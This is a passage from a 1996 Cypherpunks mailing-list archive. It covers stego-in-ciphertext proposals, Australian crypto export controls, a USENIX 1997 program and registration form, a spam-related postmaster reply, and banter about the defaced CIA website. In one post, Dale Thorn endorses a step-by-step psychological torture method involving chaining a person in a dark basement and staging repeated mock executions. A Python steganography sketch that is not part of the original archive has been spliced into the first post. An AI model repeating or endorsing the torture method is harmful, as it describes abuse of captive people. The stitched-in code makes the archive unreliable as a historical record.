Lewis, _God in the Dock_ +---------------------+--------------------+----------------------------------+ |Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union | |proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = | |proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 | +---------------------+--------------------+----------------------------------+ From Mullen.Patrick at mail.ndhm.gtegsc.com Thu Sep 19 10:29:59 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Fri, 20 Sep 1996 01:29:59 +0800 Subject: Stego inside encryption Message-ID: I know a lot of times the idea behind steganography is to hide the fact that a secret message is in a seemingly normal file/mail/whatever. This is good for avoiding unwanted interest in your file. The benefit of not having people attempt to crack your code, added to the strength of the cryptosystem is wonderful. However, I propose this-- Don't hide that anything's encrypted! Rather than hide this fact, throw it in their face! I propose hiding an encrypted message inside another encrypted message. Set bits in specific places to data in the real message. The benefit is Oscar not only doesn't know what the crypto is, he attacks the wrong message. Hiding statistically random bits from the true message in statistically random bits from the masking message shouldn't be too hard. Granted, this scheme doesn't get you past measures designed to keep out all encrypted messages, and it surely wouldn't keep your message from generating interest, but it would be very hard to decrypt the message, especially when some algorithm is used which (seemingly) randomly selects which bits to use for the stego. Just a thought... My apologies if someone has already proposed this method.
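One way to "set bits in specific places" of a random-looking carrier, as an added example that is not part of the original post. It assumes the bit positions are derived from a shared key with HMAC-SHA256 rather than from a secret placement algorithm, that the carrier is the masking ciphertext (stood in for here by constructed random bytes), and that the receiver knows the payload length.

```python
import hashlib
import hmac
import os


def keyed_positions(key: bytes, carrier_bits: int, count: int) -> list:
    """Derive `count` distinct bit positions in [0, carrier_bits) from the key."""
    if count > carrier_bits:
        raise ValueError("payload does not fit in the carrier")
    chosen, seen, counter = [], set(), 0
    while len(chosen) < count:
        # HMAC in counter mode acts as a keyed pseudo-random generator.
        block = hmac.new(key, counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
        for i in range(0, len(block), 4):
            # Reduction mod carrier_bits has a small bias, ignored in this sketch.
            pos = int.from_bytes(block[i:i + 4], "big") % carrier_bits
            if pos not in seen:
                seen.add(pos)
                chosen.append(pos)
                if len(chosen) == count:
                    break
    return chosen


def embed(key: bytes, carrier: bytes, payload: bytes) -> bytes:
    """Overwrite the key-selected carrier bits with the payload bits."""
    out = bytearray(carrier)
    positions = keyed_positions(key, len(carrier) * 8, len(payload) * 8)
    for n, pos in enumerate(positions):
        bit = (payload[n // 8] >> (7 - n % 8)) & 1
        mask = 1 << (7 - pos % 8)
        if bit:
            out[pos // 8] |= mask
        else:
            out[pos // 8] &= ~mask & 0xFF
    return bytes(out)


def extract(key: bytes, stego: bytes, payload_len: int) -> bytes:
    """Read the payload back from the same key-selected positions."""
    positions = keyed_positions(key, len(stego) * 8, payload_len * 8)
    out = bytearray(payload_len)
    for n, pos in enumerate(positions):
        bit = (stego[pos // 8] >> (7 - pos % 8)) & 1
        out[n // 8] |= bit << (7 - n % 8)
    return bytes(out)


def changed_positions(before: bytes, after: bytes) -> set:
    """Bit positions (MSB first) at which two equal-length byte strings differ."""
    return {
        i * 8 + j
        for i, (x, y) in enumerate(zip(before, after))
        for j in range(8)
        if ((x ^ y) >> (7 - j)) & 1
    }


if __name__ == "__main__":
    key = b"constructed shared key"   # sample value for the demo
    inner = os.urandom(16)            # stands in for the real message's ciphertext
    carrier = os.urandom(256)         # stands in for the masking ciphertext
    stego = embed(key, carrier, inner)
    print(extract(key, stego, len(inner)) == inner)
    print(len(changed_positions(carrier, stego)), "carrier bits flipped")
```

Overwriting bits of a real masking ciphertext leaves it unable to decrypt cleanly, so the carrier can only serve as a decoy.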
Patrick From dthorn at gte.net Thu Sep 19 11:27:27 1996 From: dthorn at gte.net (Dale Thorn) Date: Fri, 20 Sep 1996 02:27:27 +0800 Subject: Mike Farrell, actor In-Reply-To: <199609190531.XAA10513@InfoWest.COM> Message-ID: <3241542F.4E70@gte.net> attila wrote: > Mike Farrell, actor and longtime opponent of the death penalty: > "We don't rape rapists, > we don't burn arsonists, > why should we kill killers?" > well, come to think of it, why don't we let a bull rape a rapist? > or burn an arsonist at the stake? > seems fair to me. maybe even sell tickets to pay for the cost. This must be just the entertainment angle. Something about ancient Roman orgies comes to mind. More to the point, if you can't figure out how to reform the offender (impossible in current prisons), and you can't get the offender to compensate the victim(s), you could at least tap into the perp's subconscious a little way and apply some inhibitors. One technique that works on a lot of violence-prone individuals: Chain the bad guy to a secure post in a dark basement somewhere, and leave them for 24 hours. On returning, flip on the light, give them a few seconds to be able to at least see your outline pretty well, then put an empty revolver next to their head and fire. Now turn off the light and leave. Repeat until subject is jelly, basically. Variations include various background noises with timing controller, etc. From Mullen.Patrick at mail.ndhm.gtegsc.com Thu Sep 19 11:32:59 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Fri, 20 Sep 1996 02:32:59 +0800 Subject: Stego inside encryption Message-ID: To take this one step further, has anyone tried to ever use this method as an encryption method? You could hide data in a stream of random bits, using position as the encryption method. Obviously, the data would not be stored in packets; rather as single bits strewn throughout the stream.
Even ASCII characters could be hidden in such a system very well, as the possibility of choosing the correct 8 bits (extended char set) from the data stream when any combination has equal potential of being the correct sequence would be extremely difficult. Error checking/correcting code could even be used.

Using this system, the placement algorithm would be the focus of attack. If an algorithm which has a sufficiently random placement was used, extracting the correct bits would be difficult.

Another way to increase the security would be to hide the correct message inside a bitstream created by using the same method on other similar messages. (Hiding a real message inside bogus messages. Hmm... Which one's real?)

Patrick

_______________________________________________________________________________
From: Mullen Patrick on Thu, Sep 19, 1996 9:19
Subject: Stego inside encryption
To: Cypherpunks

I know a lot of times the idea behind steganography is to hide the fact that a secret message is in a seemingly normal file/mail/whatever. This is good for avoiding unwanted interest in your file. The benefit of not having people attempt to crack your code, added to the strength of the cryptosystem is wonderful.

However, I propose this-- Don't hide that anything's encrypted! Rather than hide this fact, throw it in their face!

I propose hiding an encrypted message inside another encrypted message. Set bits in specific places to data in the real message. The benefit is Oscar not only doesn't know what the crypto is, he attacks the wrong message. Hiding statistically random bits from the true message in statistically random bits from the masking message shouldn't be too hard.
Granted, this scheme doesn't get you past measures designed to keep out all encrypted messages, and it surely wouldn't keep your message from generating interest, but it would be very hard to decrypt the message, especially when some algorithm is used which (seemingly) randomly selects which bits to use for the stego.

Just a thought... My apologies if someone has already proposed this method.

Patrick

From adam at homeport.org Thu Sep 19 11:37:07 1996
From: adam at homeport.org (Adam Shostack)
Date: Fri, 20 Sep 1996 02:37:07 +0800
Subject: Systems/Communications Security Positions in the South Bay
In-Reply-To:
Message-ID: <199609191522.KAA05519@homeport.org>

Add a (work available) tag to your subject, and we'll all be fine with it. What good's a revolution if you can't get rich? :)

Adam

Steve Dyson wrote:
| I know someone is going to get PO'd about this, but I didn't know how else
| to get these in front of you in a timely manner. These positions are
| critical and interesting parties can interview next week, please read on:

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From matt at lust.bio.uts.edu.au Thu Sep 19 11:40:52 1996
From: matt at lust.bio.uts.edu.au (Matthew Gream)
Date: Fri, 20 Sep 1996 02:40:52 +0800
Subject: Australian "ITAR" regulations
In-Reply-To: <199609190543.WAA01040@toad.com>
Message-ID: <199609191504.BAA11734@lust.bio.uts.edu.au>

Hi Sherry,

> Some time ago I had various email exchanges regarding Australian crypto
> export regulations. More recently I've been put in the picture by David
> Cox and others that there are in fact ITAR-like laws in force in Australia.
> The last time I looked into this, Matt Crean(?) had very little luck finding
> any info from the various relevant departments, half of whom didn't seem
> to have a clue.

Yes I did in fact investigate this area back in 1994. I managed to obtain sufficient information to indicate that there were ITAR like controls in place.
My liaisons with departments did result in some vague answers though, but the legislation was clear. You can find details about my findings at:

http://www.next.com.au/spyfood/geekgirl/001stick/crypto/aust/index.html

I've not revisited the area since that time, so there may have been recent developments.

As you have mentioned, there are indeed controls. The regulations enforce these through two mechanisms; the first being explicit coverage in the Prohibited Exports Regulations, and the second through COCOM related DUT controls via. documentation referenced in said regulations. This latter area may have been revised with recent COCOM activity.

At the time, and I suspect still at this point in time, there seems to be little awareness that these controls are in place.

Cheers,
Matthew.

--
Matthew Gream -- matt at lust.bio.uts.edu.au.

From mab at crypto.com Thu Sep 19 11:46:35 1996
From: mab at crypto.com (Matt Blaze)
Date: Fri, 20 Sep 1996 02:46:35 +0800
Subject: 1997 USENIX Technical Conference info
Message-ID: <199609191319.JAA12275@crypto.com>

USENIX 1997 ANNUAL TECHNICAL CONFERENCE
January 6-10, 1997, Anaheim, California

Co-Located with:
USELINUX: Linux Applications Development & Deployment Conference
Co-Sponsored by Linux International and the USENIX Association

PROGRAM AT A GLANCE AND IMPORTANT DATES TO REMEMBER
=====================================================
Early Registration Savings Deadline: November 22, 1996
Hotel Discount Deadline: December 20, 1996
=====================================================

SUNDAY, JANUARY 5
Registration 4:00pm - 9:00pm
Kickoff Reception 6:00pm - 9:00pm

MONDAY, JANUARY 6
Registration 7:30am - 5:00pm
Tutorials 9:00am - 5:00pm

TUESDAY, JANUARY 7
Registration 7:30am - 5:00pm
Tutorials 9:00am - 5:00pm
Birds-of-a-Feather Sessions 6:00pm - 10:00pm

WEDNESDAY, JANUARY 8
Registration 7:30am - 6:00pm
Keynote Address 9:00am - 10:30am
Technical Sessions 11:00am - 5:00pm
USELINUX Developers 9:00am - 5:30pm
Vendor Display 12:00am - 7:00pm
USELINUX Case Studies 7:30pm - 11:00pm
Birds-of-a-Feather Sessions 7:30pm - 11:00pm

THURSDAY, JANUARY 9
Registration 7:30am - 6:00pm
Technical Sessions 9:00am - 6:00pm
USELINUX Developers 9:00am - 5:30pm
Vendor Display 10:00am - 4:00pm
Birds-of-a-Feather Sessions 6:00pm - 10:00pm
USELINUX Case Studies 6:00pm - 10:00pm

FRIDAY, JANUARY 10
Technical Sessions 9:00am - 5:45pm
USELINUX Business 9:00am - 4:00pm

NEW AT ANAHEIM:
===============
USELINUX, the Linux Applications Development and Deployment Conference, co-sponsored by Linux International and USENIX. If you are: An application developer porting or developing Linux applications, a system administrator having to maintain Linux systems, a business person who wishes to develop a Linux business, plan to attend USELINUX. One fee covers the registration for both conference programs, and you can go freely back and forth between them. (Tutorials carry a separate fee for both USENIX and USELINUX).

=================================
TUTORIAL PROGRAM
Monday-Tuesday, January 6-7, 1997
=================================
Register now to guarantee your first choice - seating is limited.

Tutorial fees include printed and bound tutorial materials from your sessions, lunch, CD-ROM with Tutorials, Refereed Papers, and Invited Talks, Admission to the Vendor Exhibits

TUTORIAL OVERVIEW

Monday, January 6
=================
M1: Beginning Perl Programming for UNIX Programmers (Updated for Perl 5)
M2: The Kerberos Approach to Network Security (Updated).
M3: An Introduction to Java
M4: Secure Java Programming
M5: Windows NT and Windows 95 - The Win32 API
M6: UNIX Network Programming
M7: Selected Topics in System Administration (New)
M8: How Networks Work - The Limits of Modern Internetworking (Updated)
M9: System and Network Performance Tuning (New)
M10: Inside the Linux 2.0 Kernel (New)

Tuesday, January 7
=================
T1: UNIX Security Tools: Use and Comparison.
T2: CGI and WWW Programming in Perl (New)
T3: Security on the World Wide Web (New)
T4: Creating Effective User Interfaces (New)
T5: Java Applets and the AWT (New)
T6: Setting Up And Administering A Web Server (New)
T7: Security for Software Developers: How to Write Code that Withstands Hostile Environments (New)
T8: Solaris System Administration (New)
T9: IP version 6: An Introduction
T10: Writing Device Drivers Under Linux (New)

COMPLETE TUTORIAL DESCRIPTIONS
Are available on our Website, http://www.usenix.org

====================================
TECHNICAL PROGRAM
Wednesday-Friday, January 8-10, 1997
====================================

TECHNICAL SESSIONS

WEDNESDAY, JANUARY 8

9:00-10:30
Opening Remarks: John Kohl, Pure Atria Corporation
Keynote Address: Developing on "Internet Time"
  James Gosling, Sun Microsystems

REFEREED PAPERS

11:00-12:30: PERFORMANCE I
Embedded Inodes and Explicit Grouping: Exploiting Disk Bandwidth for Small Files
  Gregory R. Ganger and M. Frans Kaashoek, Massachusetts Institute of Technology
Observing the Effects of Multi-Zone Disks
  Rodney Van Meter, Information Sciences Institute, University of Southern California
A Revisitation of Kernel Synchronization Schemes
  Christopher Small and Stephen Manley, Harvard University

2:00-3:30: INTERFACE TRICKS
Porting UNIX to Windows NT
  David G. Korn, AT&T Research
Protected Shared Libraries - A New Approach to Modularity and Sharing
  Arindam Banerji, John M. Tracey, and David L. Cohn, University of Notre Dame
A Novel Way of Extending the Operating System at the User-Level: the Ufo Global File System
  Albert D. Alexandrov, Maximilian Ibel, Klaus E. Schauser, and Chris J. Scheiman, University of California, Santa Barbara

4:00-5:00: CLIENT TRICKS
Network-aware Mobile Programs
  Mudumbai Ranganathan, Anurag Acharya, Shamik Sharma, and Joel Saltz, University of Maryland
Using Smart Clients to Build Scalable Services
  Chad Yoshikawa, Brent Chun, Paul Eastham, Amin Vahdat, Thomas Anderson, and David Culler, University of California, Berkeley

THURSDAY, JANUARY 9

9:00-10:30: CLUSTERING
Building Distributed Process Management on an Object-Oriented Framework
  Ken Shirriff, Sun Microsystems Laboratories
Adaptive and Reliable Parallel Computing on Networks of Workstations
  Robert D. Blumofe, University of Texas, Austin and Philip A. Lisiecki, Massachusetts Institute of Technology
A Distributed Shared Memory Facility for FreeBSD
  Pedro A. Souto and Eugene W. Stark, State University of New York, Stony Brook

11:00-12:30: TOOLS
Libcdt: A General and Efficient Container Data Type Library
  Kiem-Phong Vo, AT&T Research
A Simple and Extensible Graphical Debugger
  David R. Hanson and Jeffrey L. Korn, Princeton University
Cget, Cput, and Stage Safe File Transport Tools for the Internet
  Bill Cheswick, Bell Laboratories

2:00-3:30: WORKS IN PROGRESS

FRIDAY, JANUARY 10

9:00-10:30: USER SOMETHING
WebGlimpse - Combining browsing and searching
  Udi Manber, Michael Smith, and Burra Gopal, University of Arizona
Mailing List Archive Tools
  Sam Leffler and Melange Tortuba, Silicon Graphics
Experience with GroupLens: Making Usenet Useful Again
  Bradley N. Miller, John T. Riedl, and Joseph A. Konstan, University of Minnesota

11:00-12:30: PERFORMANCE II
Overcoming Workstation Scheduling Problems in a Real-Time Audio Tool
  Isidor Kouvelas and Vicky Hardman, University College London
On Designing Lightweight Threads for Substrate Software
  Matthew Haines, University of Wyoming
High-Performance Local-Area Communication With Fast Sockets
  Steven H. Rodrigues, Thomas E. Anderson, and David E. Culler, University of California, Berkeley

2:00-3:30: CACHING and STASHING
An Analytical Approach to File Prefetching
  Hui Lei and Dan Duchamp, Columbia University
Optimistic Deltas for WWW Latency Reduction
  Gaurav Banga, Fred Douglis, and Michael Rabinovich, AT&T Research
A Toolkit Approach to Partially Connected Operation
  Dan Duchamp, Columbia University

4:15-5:45: JOINT CLOSING SESSION
Severe Tire Damage's Stupid Mbone Tricks - A Lecture/Demonstration

INVITED TALKS
=============

WEDNESDAY, JANUARY 8
11:00-12:30: Nomadicity and the IETF
  Charles E. Perkins, IBM T.J. Watson Research Center
2:00-3:30: If Cryptography Is So Great, Why Isn't It Used More?
  Matt Blaze, AT&T Research
4:00-5:00: The Inktomi Web Search Engine
  Eric Brewer, University of California, Berkeley

THURSDAY, JANUARY 9
9:00-10:30: The AltaVista Web Search Engine
  Louis Monier, Digital Equipment Corporation
11:00-12:30: IPv6: The New Version of the Internet Protocol
  Steve Deering, Xerox Palo Alto Research Center
2:00-3:30: Highlights from 1996 USENIX Conferences and Workshops
4:00-5:30: Inferno
  Rob Pike, Bell Labs

FRIDAY, JANUARY 10
9:00-10:30: Measuring Computer Systems: How to Tell the Truth with Numbers
  Margo Seltzer and Aaron Brown, Harvard University
11:00-12:30: Stupid Net Tricks
  Bill Cheswick, Bell Laboratories
2:00-3:30: Finding Bugs in Concurrent Programs
  Gerard J. Holzmann, Bell Laboratories

USELINUX PROGRAM
=================

USELINUX DEVELOPERS

WEDNESDAY, JANUARY 8
9:00-10:30: Linux: What It Is and Why It Is Significant
  Mark Bolzern, Work Group Solutions
  Tom Miller, X Engineering Software Systems
11:00-12:30: The Sparc Port of Linux
  David S. Miller, Rutgers CAIP
  Miguel de Icaza, Instituto de Ciencias Nucleares, Ciudad Universitaria, Universidad Nacional Autonoma de Mexico
2:00-3:30: Advanced Device Drivers
  Alessandro Rubini, Universita di Pavia
4:00-5:00: Future of the Linux Kernel
  Linus Torvalds, Helsinki University

THURSDAY, JANUARY 9
9:00-10:30: Real Time
  Victor Yodaiken and Michael Barabanov, New Mexico Institute of Technology
11:00-12:30: /proc
  Stephen Tweedie, Digital Equipment Corporation
11:00-12:30: The Pluggable Authentication Modules (PAM) Framework
  Ted Tso, Massachusetts Institute of Technology
2:00-3:30: Standards
  Heiko Eissfeldt, Unifix Software
4:00-5:30: Connecting Legacy and Open Systems
  Michael Callahan, Stelias Computing, Inc.

USELINUX BUSINESS
=================

FRIDAY, JANUARY 10
9:00-9:30: Linux: What It Is and Why It Is Significant
  Mark Bolzern, Work Group Solutions
  Tom Miller, X Engineering Software Systems
9:30-10:30: Linux and Distribution Channels: Ways to Enter the Commercial Market
  Dan Rosenberg, Stromian Technologies
11:00-12:30: Using Linux in Your Business: A Business Justification
  Presented by Linux International
2:00-4:00: The Linux Market: Who, What, Where, When and Why?
  Presented by Linux International

USELINUX PRESENTATIONS AND CASE STUDIES DESCRIPTIONS
====================================================

WEDNESDAY, JANUARY 8, 7:30pm - 11:00pm
The Use of Linux for Dedicated Systems
  Chel van Gennip, HISCOM BV
Perceptions: A Strategic Deployment of Linux in the Health Care Environment
  Greg Wettstein, Velocity LLC
The Future of the Linux Desktop
  Ken Apa, Governors State University; Jim Fetters, Chicago Mercantile Exchange; Joe Sloan, Toyota Motor Sales USA
The Classroom of the Future
  Karl Jeacle, Broadcom Eireann Research Ltd.
THURSDAY, JANUARY 9, 6:00pm - 10:30pm
Using GNUstep to Deploy User Applications
  Scott Christley, NET-Community
Embedded, Turnkey and Real Time
  Phil Hughes, Linux Journal
Developing Linux-based Electronic Markets for Internet Trading Experiments
  Paul J. Brewer, Georgia State University

VENDOR EXHIBITION
=================
Wednesday, January 8, Noon - 7:00pm
Thursday, January 9 10:00am - 4:00pm

If you cannot make it to the conference but would like to visit the exhibition, please contact Cynthia Deno, Exhibit Coordinator, at 408-335-9445 or cynthia at usenix.org.

Vendors:
========
The USENIX 97 Exhibition offers: "Two days of exposure to the cream of the UNIX User Community."
-Neil Groundwater, Enterprise Management Group, SunSoft, Inc.

Please contact:
Cynthia Deno, Exhibit Co-ordinator
Tel: 408-335-9445
Fax: 408-335-5327
cynthia at usenix.org

GENERAL CONFERENCE INFORMATION

Birds-of-a-Feather Sessions (BoFs)
==================================
Tuesday, Wednesday, and Thursday evenings

Do you have a topic that you'd like to discuss with others? Birds-of-a-Feather sessions may be perfect for you. BoFs are interactive, informal gatherings for attendees interested in a particular topic. Schedule your BoF in advance. Call the Conference Office at 714.588.8649 or send email to conference at usenix.org. Topics are announced at the conference. BoFs may also be scheduled on-site.

The Guru is IN
==============
Have a question that's been bothering you? Try asking a USENIX guru! Noted experts from the USENIX community will be available to spark controversy and answer questions. Please contact the Invited Talks Coordinators via email to ITusenix at usenix.org if you would like to volunteer your expertise.

Works-in-Progress Reports
=========================
Short, pithy, and fun, Works-in-Progress Reports (WIPs) introduce interesting new or ongoing work. If you have work to share or a cool idea not quite ready to be published, a WIP Report is for you!
You will receive insightful feedback. We are particularly interested in presenting student work. WIPs are scheduled within the technical sessions program. To reserve a slot, send email to wips at usenix.org. Topics are announced on-site.

CONFERENCE SERVICES

Terminal Room
=============
Internet and dial-out access are provided in the Terminal Room. The Terminal Room will be open throughout the conference week. Look for details posted to comp.org.usenix.

Attendee Message Service
========================
Electronic message service will be available Monday, January 6 through Friday, January 10. Electronic messages to conference attendees should be addressed: first_lastname at conference.usenix.org.

HOTEL AND TRAVEL INFORMATION:
============================
Hotel Discount Reservation Deadline: Friday, December 20, 1996

USENIX has negotiated special rates for conference attendees at the Anaheim Marriott. Contact the hotel directly to make your reservation. You must mention USENIX to get the special rate. A one-night room deposit must be guaranteed to a major credit card. To cancel your reservation, you must notify the hotel at least 24 hours before your planned arrival date.

Anaheim Marriott
700 West Convention Way
Anaheim, CA 92802
Toll Free: 800.228.9290
Phone: 714.750.8000
Reservation Fax: 714.750.9100

Room Rates: $107/Single, $117/Double (plus local taxes, currently at 15%)

Need a Roommate?
Usenet facilitates room sharing. If you wish to share a room, post to and check comp.org.usenix.roomshare.

Discount Airfares and Car Rentals
Special discounted air fares and car rentals are available only through JNR, Inc., a full service travel agency. All restrictions apply. Please call JNR for details. Call toll free 800.343.4546 in the USA and Canada or telephone 714.476.2788.

STUDENT STIPENDS AND DISCOUNTS
==============================
TUTORIALS: A limited number of seats in each tutorial are reserved for full-time students at the very special rate of $70.00 per tutorial.
To take advantage of this, you must telephone the conference office to confirm availability and make a reservation. You will receive a reservation code number which must appear on your registration form. Your registration form with full payment and a photocopy of your current student ID card must arrive within 14 days from the date of your reservation. If they do not arrive by that date, your reservation will be canceled. This special fee is non-transferable.

TECHNICAL SESSIONS: USENIX offers a discount rate of $75 for technical sessions for full-time students. You must include a copy of your current student I.D. card with your registration. This fee is not transferable.

STIPENDS: Student stipends are available to pay for travel, living expenses and registration fees to enable full-time students to attend this conference. To apply for a stipend, read comp.org.usenix six to eight weeks before the conference, visit our Web site, http://www.usenix.org, or contact Diane DeMartini (diane at usenix.org) for more information.

********************************************************************
To obtain descriptions concerning the tutorials and technical sessions, and full conference information, please contact USENIX via any one of the following methods:

* Visit our Website, URL: http://www.usenix.org
* Send email to our mailserver at: info at usenix.org
  Your message should contain the line: send usenix97 conferences
* Contact: USENIX Conference Office, 22672 Lambert St., Suite 613, Lake Forest, CA USA 92630
  Phone: 714-588-8649
  Fax: 714-588-9706
  Email: conference at usenix.org
********************************************************************

USENIX ASSOCIATION
The USENIX Association brings together the community of engineers, system administrators, scientists, and technicians working on the cutting edge of computing.
Its technical conferences are the essential meeting grounds for the presentation and discussion of the most advanced information on new developments in all aspects of advanced computing systems.

==========================CUT HERE================================

REGISTRATION FORM - USENIX 1997 TECHNICAL CONFERENCE
January 6-10, 1997, Anaheim, California
=================================================================
WWW

Please complete the form below and return with full payment to:

USENIX CONFERENCE OFFICE
22672 Lambert St., Suite 613, Lake Forest, CA 92630
Telephone: (714) 588-8649 / FAX Number (714) 588-9706
Electronic Mail Address: conference at usenix.org
Office Hours: 8:30am - 5:00pm Pacific Time

NAME________________________________________________________________
(first) (last)
FIRST NAME FOR BADGE____________________________ USENIX Member ID____________________
COMPANY OR INSTITUTION______________________________________________
MAILING ADDRESS_____________________________________________________
(mail stop)
____________________________________________________________________
CITY___________________________STATE_____COUNTRY________ZIP____________
TELEPHONE NO:_________________________FAX NO._________________________
NETWORK ADDRESS______________________________________________________
(one only please)

The address you provide will be used for all future USENIX mailings unless you notify us in writing.

ATTENDEE PROFILE
Please help us serve you better. By answering the following questions, you help us plan our activities to meet members' needs. All information is confidential.

[ ] I do not want to be on the attendee list
[ ] I do not want my address made available for other than USENIX mailings
[ ] I do not want USENIX to email me notices of Association activities.

What is your affiliation? [ ]academic [ ]commercial [ ]gov't [ ]R&D

What is your role in purchase decision?
1.[] final 2.[] specify 3.[] recommend 4.[] influence 5.[] no role

What is your job function? (check one)
1.[] system/network administrator 2.[] consultant 3.[] academic/research 4.[] developer/programmer/architect 5.[] system engineer 6.[] technical manager 7.[] student 8.[] security 9.[] webmaster

How did you hear about this meeting:
1.[] USENIX brochure 2.[] newsgroup/bulletin board 3.[] ;login: 4.[] World Wide Web 6.[] from a colleague 7.[] magazine

What publications or newsgroups do you read related to advanced computing systems?_____________________________________________

=================================================================
TUTORIAL PROGRAM
Select only one full-day tutorial per day - 9:00am-5:00pm

Monday, January 6, 1997
========================
[ ] M1: Beginning Perl Programming
[ ] M2: Kerberos Approach to Network Security
[ ] M3: Introduction to Java
[ ] M4: Secure Java Programming
[ ] M5: Windows NT and Windows 95
[ ] M6: UNIX Network Programming
[ ] M7: Topics in System Administration
[ ] M8: How Networks Work
[ ] M9: System and Network Performance Tuning
[ ] M10: Inside the Linux 2.0 Kernel
Second Choice if first is filled:____________________________

Tuesday, January 7, 1997
=========================
[ ] T1: UNIX Security Tools
[ ] T2: CGI and WWW Programming in Perl
[ ] T3: Security on the Web
[ ] T4: Creating Effective User Interfaces
[ ] T5: Java Applets and the AWT
[ ] T6: Setting Up and Administering a Web Server
[ ] T7: Security for Software Developers
[ ] T8: Solaris System Administration
[ ] T9: IP version 6
[ ] T10: Writing Device Drivers Under Linux
Second Choice if first is filled:____________________________

TUTORIAL PROGRAM FEES (January 6-7)
Two full-day tutorials.................$620 $_________
CEU credit (optional)..................$ 30 $_________
One full-day tutorial..................$335 $_________
CEU credit (optional)..................$ 15 $_________
Late fee applies if postmarked after Friday, November 22, 1996........Add $ 50 $_________
Full-Time Students (see "STUDENT STIPENDS AND DISCOUNTS" above on how to obtain code)
CODE NO:______________________ $ 70 $_________
CODE NO:______________________ $ 70 $_________

TECHNICAL SESSION FEES
Current Member Fee.....................$340 $________
(Applies to current USENIX, EurOpen national groups, JUS and AUUG, and Linux Int'l members)
Non-Member or Renewing Member Fee**....$410 $________
**Join or renew your USENIX/SAGE membership and attend the conference for same low price -Check here [ ]
Join or renew your SAGE membership...Add $ 25 $_________
(You must be a member of USENIX)
Late fee applies if postmarked after Friday, November 22, 1996..........Add $ 50 $_________
Full-Time Student Fee*: pre-registered or on-site......$ 75 $_________
Full-Time Student Fee* including USENIX membership fee......$100 $_________
*Students must include photocopy of current student I.D.

TOTAL ENCLOSED...................$_________

PAYMENT MUST ACCOMPANY THIS FORM. Payment in US Dollars must accompany this form. Purchase orders, vouchers, telephone or email registrations cannot be accepted.

[ ] Payment Enclosed (Make check payable to USENIX Conference)

CHARGE TO MY: ___VISA ___MASTERCARD ___AMERICAN EXPRESS ___DINERS CLUB
ACCOUNT NO.______________________________________ EXP. DATE___________
_______________________________________/___________________________
Print Cardholder's Name Cardholder's Signature

You may fax your registration form if paying by credit card to USENIX Conference Office, fax: 714-588-9706. (To avoid duplicate billing, please DO NOT mail an additional copy.)

REFUND CANCELLATION POLICY: If you must cancel, all refund requests must be in writing and postmarked no later than December 27, 1996. Telephone cancellations cannot be accepted. You may telephone to substitute another in your place.

From james_oshea at smb.com Thu Sep 19 11:55:01 1996
From: james_oshea at smb.com (James P. O'Shea III)
Date: Fri, 20 Sep 1996 02:55:01 +0800
Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building
In-Reply-To: <01BBA60C.5AD5CCC0@misd145.cern.ch>
Message-ID: <9609191046.ZM9184@ws232034>

On Sep 19, 9:24am, Batman wrote:
> Subject: RE: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal B
>For the 200th time, unsubscribe me of your fucked mail lists.
>
>-- End of excerpt from Batman

Apologies if you receive more than one copy of this message, but I'm auto-replying to your message to handle the flood:

Redistribution to the list from which you originally received the problem message is kindly requested.

Thank you for bringing this matter to our attention. The email or posting you have seen falsely represents Smith Barney and its employees. These are erroneous postings that did not originate from anyone employed by our firm, and therefore we cannot directly stop them from occurring. However we have advised the companies we believe to have serviced the originator of these messages and we are pursuing all possible steps to end this fraud. Unfortunately some people abuse the Internet and we regret any inconvenience they may have caused you.

There are currently no mailing lists maintained in the smb.com domain, so you were not subscribed to any list. If you receive any further messages of this nature, they are the product of the same spurious source. We're sorry for any inconvenience you may have experienced as a result of this unfortunate abuse of the 'Net.

Further queries via email to postmaster at smb.com please.

Thanks.

-James
postmaster, network security, etc.

-----------------------
James P. O'Shea III
Smith Barney Inc.
postmaster at smb.com

--
---------------------------->>>>Note NEW PAGER numbers 6/27/96
James P. O'Shea III 212-723-5885 (voice)
Systems Administrator 212-723-5021 (fax)
Smith Barney Inc.
390 Greenwich/6 West 800-225-0256 PIN 306296 (alpha page)
jposhea3 at panix.com 917-820-5855 (digital page)
james_oshea at smb.com

From dlv at bwalk.dm.com Thu Sep 19 12:09:27 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 20 Sep 1996 03:09:27 +0800
Subject: CIA hacked
In-Reply-To:
Message-ID: <5w5HuD6w165w@bwalk.dm.com>

Mike van der Merwe writes:
> I'm sure we will find out in a few years that Microsoft invented the
> Net. Or brought it to the masses. Or saved it from a certain and
> early demise. Or all of the above.
> JAMES SEYMOUR

Dr. John M. Grubor created the 'net.

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From skeeve at skeeve.net Thu Sep 19 12:14:52 1996
From: skeeve at skeeve.net (Skeeve Stevens)
Date: Fri, 20 Sep 1996 03:14:52 +0800
Subject: CIA hacked
In-Reply-To:
Message-ID: <199609191511.BAA24236@myinternet.myinternet.net>

You, Mike van der Merwe, shaped the electrons to say:
+
+
+Hi everybody
+
+Heh! This one's good for a laugh :-))
+
+http://www.odci.gov/cia
+
+Seems the DOJ hack was a good inspiration. Heh! Life's good when you're
+willing to work at it.
+
+Later
+Mike

Did you or anyone get a mirror of the site?! I wanna set one up! ;)

--------------------------------------------------------------------
Skeeve Stevens                          Email: skeeve at skeeve.net
CEO/The Big Boss/All round nice guy     URL: http://www.skeeve.net/
MyInternet                              Australian Anglicans Online
http://www.myinternet.net/              http://www.anglican.asn.au/
Phone: (+612) 869-3334                  Mobile: (0414) SKEEVE [+61414-753-383]
Key fingerprint = D2 7E 91 53 19 FE D0 5C DE 34 EA AF 7A 5C 4D 3E

From mikev at is.co.za Thu Sep 19 12:24:18 1996
From: mikev at is.co.za (Mike van der Merwe)
Date: Fri, 20 Sep 1996 03:24:18 +0800
Subject: CIA hacked
In-Reply-To: <199609191511.BAA24236@myinternet.myinternet.net>
Message-ID:

